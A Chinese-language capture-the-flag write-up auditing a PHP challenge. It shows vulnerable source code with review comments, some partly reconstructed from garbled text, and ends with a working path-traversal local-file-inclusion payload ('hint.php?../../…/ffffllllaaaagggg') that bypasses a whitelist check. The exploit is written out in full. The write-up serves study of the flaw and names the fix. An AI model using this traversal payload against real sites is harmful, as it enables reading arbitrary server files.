打开网站
查看源码
访问 source.php，开始代码审计。关键点在于：`emmm::checkFile()` 校验的是截掉 `?` 之后的副本，而最后 `include` 用的仍是未经修改的原始 `$_REQUEST['file']`。
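<?php
// Reconstructed from the extraction-garbled "<!--?php" open tag.
// Echo this file's own syntax-highlighted source: the challenge deliberately
// exposes its code for audit.
highlight_file(__FILE__);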
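class emmm
{
    /**
     * Whitelist gate for the `file` request parameter.
     *
     * Returns true when $page — taken as-is, or truncated at its first '?',
     * or urldecode()d once and then truncated at its first '?' — is exactly
     * "source.php" or "hint.php". Otherwise echoes "you can't see it" and
     * returns false. Non-string / unset input takes the same failure path.
     *
     * NOTE(review): $page is received by reference but never written back.
     * Only the truncated prefix ($_page) is validated, yet the caller goes on
     * to include the ORIGINAL, untruncated string. A value such as
     * "hint.php?../../../../flag" therefore passes the second check and is
     * included verbatim — this is the local file inclusion the write-up
     * exploits. The minimal fix is to canonicalise through the reference
     * (`$page = $_page;` before each `return true`), and the robust fix is for
     * the caller to include the whitelist entry rather than the request value.
     *
     * @param string $page candidate filename (by reference; never modified here)
     * @return bool
     */
    public static function checkFile(&$page)
    {
        // "=-->" in the extracted listing was an HTML-garbled "=>".
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }
        // 1) exact match against the whitelist values.
        if (in_array($page, $whitelist)) {
            return true;
        }
        // 2) keep only the part before the first '?'. Appending '?' guarantees
        //    mb_strpos() finds something, so a value without '?' is kept whole.
        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        // 3) same as (2) after one urldecode(), so an encoded '?' (%3F) also
        //    acts as the cut point. PHP already decoded the query string once
        //    when filling $_REQUEST, so this covers a double-encoded "%253F".
        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}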
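// Gate, then include. The gate validates a truncated copy, but the include
// receives the raw request value unchanged (checkFile() never writes its
// by-reference argument). Any value whose prefix before the first '?' is a
// whitelisted name is therefore passed straight to `include` — an include of
// a path derived from user input (local file inclusion). A safe version would
// include the whitelist entry itself, never $_REQUEST['file'].
if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file']; // the sink
    exit;
} else {
    // Reconstructed from the extraction-garbled listing: a single <img> tag
    // pointing at the URL whose pieces survived in the garbled attributes.
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}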
?>
source.php?file=hint.php  （hint.php 在白名单内，可直接包含；下一步用到的 flag 文件名应来自它给出的提示。）
?file=hint.php?../../../../../../ffffllllaaaagggg  （`checkFile()` 截掉第一个 `?` 之后的内容，得到 `hint.php`，校验通过；但 `include` 拿到的仍是完整字符串，`hint.php?` 被当作一个路径段，足够多的 `../` 将其抵消并上溯到根目录，最终包含根目录下的 ffffllllaaaagggg。）